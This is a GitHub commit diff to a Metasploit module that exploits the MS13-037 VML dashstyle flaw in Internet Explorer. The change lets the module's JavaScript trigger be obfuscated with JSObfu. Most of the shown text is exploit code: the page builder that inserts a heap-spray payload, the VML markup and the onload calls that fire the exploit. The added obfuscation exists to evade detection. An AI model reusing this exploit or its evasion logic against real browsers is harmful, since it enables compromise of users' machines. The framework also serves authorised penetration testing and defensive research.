Skip to content

Commit a1c7961

Browse files
author
jvazquez-r7
committed
Suport js obfuscation for the trigger
1 parent 5240c6e commit a1c7961

File tree

1 file changed

+53
-24
lines changed

1 file changed

+53
-24
lines changed

modules/exploits/windows/browser/ms13_037_svg_dashstyle.rb

Lines changed: 53 additions & 24 deletions
Original file line numberDiff line numberDiff line change
@@ -201,19 +201,7 @@ def load_exploit_html(my_target, cli)
201201
p = get_payload(my_target, cli)
202202
js = ie_heap_spray(my_target, p)
203203

204-
html = %Q|
205-
<html>
206-
<head>
207-
<script>
208-
#{js}
209-
</script>
210-
<meta http-equiv="x-ua-compatible" content="IE=EmulateIE9" >
211-
</head>
212-
<title>
213-
</title>
214-
<style>v\\: * { behavior:url(#default#VML); display:inline-block }</style>
215-
<xml:namespace ns="urn:schemas-microsoft-com:vml" prefix="v" />
216-
<script>
204+
js_trigger = %Q|
217205
var rect_array = new Array()
218206
var a = new Array()
219207
@@ -247,29 +235,47 @@ def load_exploit_html(my_target, cli)
247235
location.reload();
248236
249237
}
250-
</script>
251-
<body onload="createRects(); exploit();">
252-
<v:oval>
253-
<v:stroke id="vml1"/>
254-
</v:oval>
255-
</body>
256-
</html>
257238
|
258239

259-
return html
260-
end
240+
create_rects_func = "createRects"
241+
exploit_func = "exploit"
242+
243+
if datastore['OBFUSCATE']
244+
js_trigger = ::Rex::Exploitation::JSObfu.new(js_trigger)
245+
js_trigger.obfuscate
246+
create_rects_func = js_trigger.sym("createRects")
247+
exploit_func = js_trigger.sym("exploit")
248+
end
261249

262-
def html_info_leak
263250
html = %Q|
264251
<html>
265252
<head>
253+
<script>
254+
#{js}
255+
</script>
266256
<meta http-equiv="x-ua-compatible" content="IE=EmulateIE9" >
267257
</head>
268258
<title>
269259
</title>
270260
<style>v\\: * { behavior:url(#default#VML); display:inline-block }</style>
271261
<xml:namespace ns="urn:schemas-microsoft-com:vml" prefix="v" />
272262
<script>
263+
#{js_trigger}
264+
</script>
265+
<body onload="#{create_rects_func}(); #{exploit_func}();">
266+
<v:oval>
267+
<v:stroke id="vml1"/>
268+
</v:oval>
269+
</body>
270+
</html>
271+
|
272+
273+
return html
274+
end
275+
276+
def html_info_leak
277+
278+
js_trigger = %Q|
273279
var rect_array = new Array()
274280
var a = new Array()
275281
@@ -314,8 +320,31 @@ def html_info_leak
314320
}
315321
316322
}
323+
|
324+
325+
create_rects_func = "createRects"
326+
exploit_func = "exploit"
327+
328+
if datastore['OBFUSCATE']
329+
js_trigger = ::Rex::Exploitation::JSObfu.new(js_trigger)
330+
js_trigger.obfuscate
331+
create_rects_func = js_trigger.sym("createRects")
332+
exploit_func = js_trigger.sym("exploit")
333+
end
334+
335+
html = %Q|
336+
<html>
337+
<head>
338+
<meta http-equiv="x-ua-compatible" content="IE=EmulateIE9" >
339+
</head>
340+
<title>
341+
</title>
342+
<style>v\\: * { behavior:url(#default#VML); display:inline-block }</style>
343+
<xml:namespace ns="urn:schemas-microsoft-com:vml" prefix="v" />
344+
<script>
345+
#{js_trigger}
317346
</script>
318-
<body onload="createRects(); exploit();">
347+
<body onload="#{create_rects_func}(); #{exploit_func}();">
319348
<v:oval>
320349
<v:stroke id="vml1"/>
321350
</v:oval>

0 commit comments

Comments
 (0)